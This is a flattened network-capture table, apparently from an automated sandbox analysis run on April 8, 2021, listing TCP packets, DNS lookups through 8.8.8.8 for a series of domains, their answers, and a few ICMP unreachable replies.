                                                                      Apr 8, 2021 13:23:00.805941105 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.806032896 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.985886097 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.522414923 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.701513052 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.701639891 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.701818943 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.880739927 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904542923 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904571056 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904774904 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.904892921 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:07.083766937 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:11.994615078 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.006978989 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.007117987 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.007415056 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.019741058 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111870050 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111903906 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111923933 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111938953 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111954927 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112023115 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112061024 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112114906 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112117052 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112144947 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112189054 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112226009 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112243891 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112293959 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.124249935 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124274015 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124366999 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.124711037 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124733925 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124802113 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.125617027 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.125638962 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.125714064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.126405954 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.126508951 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.126562119 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.127289057 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.127310038 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.127353907 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.128182888 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.128226042 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.128273010 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.129050970 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.129069090 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.129148960 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.130053997 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.130074024 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.130122900 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.130846024 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131031990 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131112099 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.131644964 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131663084 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131721973 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.136761904 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.136781931 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.136852980 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.136960030 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.136992931 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.137039900 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.137900114 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.137918949 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.137976885 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.138693094 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.138709068 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.138819933 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.138936996 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.155651093 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201056957 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201080084 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201095104 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201107979 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201154947 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201209068 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201267958 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201319933 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201428890 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201452017 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201487064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201544046 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201591969 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202033043 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202052116 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202068090 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202084064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202094078 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202116013 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202159882 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202994108 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203017950 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203032970 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203049898 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203067064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.203124046 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.203597069 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203615904 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203632116 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203648090 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203668118 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.203701973 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.204530954 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204561949 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204576969 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204593897 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204602003 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.204639912 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.205282927 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205302000 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205327034 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205362082 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.205375910 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205400944 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.205441952 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.206058025 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206084013 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206108093 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206135988 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206142902 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.206190109 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.206939936 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206963062 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206984997 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.207006931 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.207022905 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.207053900 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.207663059 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.207722902 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210258007 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210284948 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210306883 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210354090 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210386992 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210400105 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210434914 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210577965 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210630894 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210643053 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210689068 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210714102 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210752010 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210762978 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210794926 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.213099003 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.213134050 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.213155985 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.213176012 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.213186026 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.213207960 CEST4977880192.168.2.4216.239.36.21

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 8, 2021 13:21:13.343260050 CEST5912353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:13.362189054 CEST53591238.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:13.465718985 CEST5453153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:13.478009939 CEST53545318.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:19.525571108 CEST4971453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:19.538274050 CEST53497148.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:21.111433983 CEST5802853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:21.124315977 CEST53580288.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:21.868928909 CEST5309753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:21.881489038 CEST53530978.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:22.641695976 CEST4925753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:22.654412985 CEST53492578.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:23.398318052 CEST6238953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:23.410882950 CEST53623898.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:24.547111988 CEST4991053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:24.597687006 CEST53499108.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:25.536561966 CEST5585453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:25.548954010 CEST53558548.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:26.429022074 CEST6454953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:26.441953897 CEST53645498.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:27.105659008 CEST6315353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:27.118328094 CEST53631538.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:28.168332100 CEST5299153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:28.180963039 CEST53529918.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:28.969247103 CEST5370053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:28.982186079 CEST53537008.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:29.601039886 CEST5172653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:29.614193916 CEST53517268.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:30.808002949 CEST5679453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:30.820566893 CEST53567948.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:31.515443087 CEST5653453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:31.528103113 CEST53565348.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:32.282509089 CEST5662753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:32.295661926 CEST53566278.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:33.046641111 CEST5662153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:33.059272051 CEST53566218.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:33.705163002 CEST6311653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:33.717596054 CEST53631168.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:43.289284945 CEST6407853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:43.302186012 CEST53640788.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:57.012099981 CEST6480153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:57.029795885 CEST53648018.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:07.081368923 CEST6172153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:07.200592995 CEST53617218.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:07.438846111 CEST5125553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:07.452756882 CEST53512558.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:09.531831026 CEST6152253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:09.544730902 CEST53615228.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:10.179213047 CEST5233753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:10.192509890 CEST53523378.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:10.773109913 CEST5504653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:10.785067081 CEST53550468.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.014154911 CEST4961253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.041070938 CEST53496128.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.115132093 CEST4928553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.128747940 CEST53492858.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.542536974 CEST5060153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.556617975 CEST53506018.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.122549057 CEST6087553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.197274923 CEST53608758.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.456660032 CEST5644853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.511807919 CEST53564488.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.653134108 CEST5917253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.666035891 CEST53591728.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:13.690680981 CEST6242053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:13.703289032 CEST53624208.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:15.543047905 CEST6057953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:15.674556971 CEST53605798.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:16.029027939 CEST5018353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:16.133337975 CEST53501838.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:17.520349979 CEST6153153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:17.701608896 CEST53615318.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:23.405999899 CEST4922853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:23.537040949 CEST5979453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:23.561050892 CEST53597948.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:23.711600065 CEST53492288.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:29.411036968 CEST5591653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:29.453022957 CEST53559168.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:34.461175919 CEST5275253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:34.608465910 CEST53527528.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:44.664508104 CEST6054253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:44.780318975 CEST53605428.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:50.023492098 CEST6068953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:50.072901964 CEST53606898.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:54.189313889 CEST6420653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:54.202052116 CEST53642068.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:55.178546906 CEST5090453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:55.218827963 CEST53509048.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:55.892683983 CEST5752553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:55.906056881 CEST53575258.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:00.396368027 CEST5381453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:00.417926073 CEST53538148.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:06.480061054 CEST5341853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:06.521147013 CEST53534188.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:11.916363001 CEST6283353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:11.993323088 CEST53628338.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:17.182508945 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:18.192764997 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:19.208389044 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:21.224176884 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:22.195578098 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:23.204312086 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:24.221883059 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:26.237104893 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:27.210115910 CEST4994453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:27.627649069 CEST53499448.8.8.8192.168.2.4

                                                                      ICMP Packets

                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                      Apr 8, 2021 13:23:23.204497099 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable
                                                                      Apr 8, 2021 13:23:24.222014904 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable
                                                                      Apr 8, 2021 13:23:26.237204075 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Apr 8, 2021 13:22:07.081368923 CEST192.168.2.48.8.8.80xd067Standard query (0)www.1364kensington.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:12.456660032 CEST192.168.2.48.8.8.80x1d91Standard query (0)www.essentials-trading.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:17.520349979 CEST192.168.2.48.8.8.80x8094Standard query (0)www.luegomusic.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:23.405999899 CEST192.168.2.48.8.8.80xa149Standard query (0)www.kf350.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:29.411036968 CEST192.168.2.48.8.8.80xdeb5Standard query (0)www.hzmsbg.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:34.461175919 CEST192.168.2.48.8.8.80x1013Standard query (0)www.quickeasybites.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:44.664508104 CEST192.168.2.48.8.8.80x1d30Standard query (0)www.pierresplayhouse.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.023492098 CEST192.168.2.48.8.8.80x79eeStandard query (0)www.thecapitalhut.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:55.178546906 CEST192.168.2.48.8.8.80xfb00Standard query (0)www.ssfgasia.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:00.396368027 CEST192.168.2.48.8.8.80xa297Standard query (0)www.desertfoxindustries.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:06.480061054 CEST192.168.2.48.8.8.80x7cc0Standard query (0)www.tennesseewheelrepair.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.916363001 CEST192.168.2.48.8.8.80xd53Standard query (0)www.rootedwithlovejax.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:17.182508945 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:18.192764997 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:19.208389044 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:21.224176884 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:27.210115910 CEST192.168.2.48.8.8.80xa670Standard query (0)www.lideresdeimmunocal.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Apr 8, 2021 13:22:07.200592995 CEST8.8.8.8192.168.2.40xd067No error (0)www.1364kensington.com66.96.161.160A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:12.511807919 CEST8.8.8.8192.168.2.40x1d91Name error (3)www.essentials-trading.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:17.701608896 CEST8.8.8.8192.168.2.40x8094No error (0)www.luegomusic.comluegomusic.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:17.701608896 CEST8.8.8.8192.168.2.40x8094No error (0)luegomusic.com162.241.244.61A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:23.711600065 CEST8.8.8.8192.168.2.40xa149No error (0)www.kf350.com107.178.142.156A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:29.453022957 CEST8.8.8.8192.168.2.40xdeb5Name error (3)www.hzmsbg.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:34.608465910 CEST8.8.8.8192.168.2.40x1013Name error (3)www.quickeasybites.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:44.780318975 CEST8.8.8.8192.168.2.40x1d30No error (0)www.pierresplayhouse.com199.59.242.153A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)www.thecapitalhut.comwww11.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)www11.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:55.218827963 CEST8.8.8.8192.168.2.40xfb00No error (0)www.ssfgasia.comssfgasia.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:55.218827963 CEST8.8.8.8192.168.2.40xfb00No error (0)ssfgasia.com34.102.136.180A (IP address)IN (0x0001)
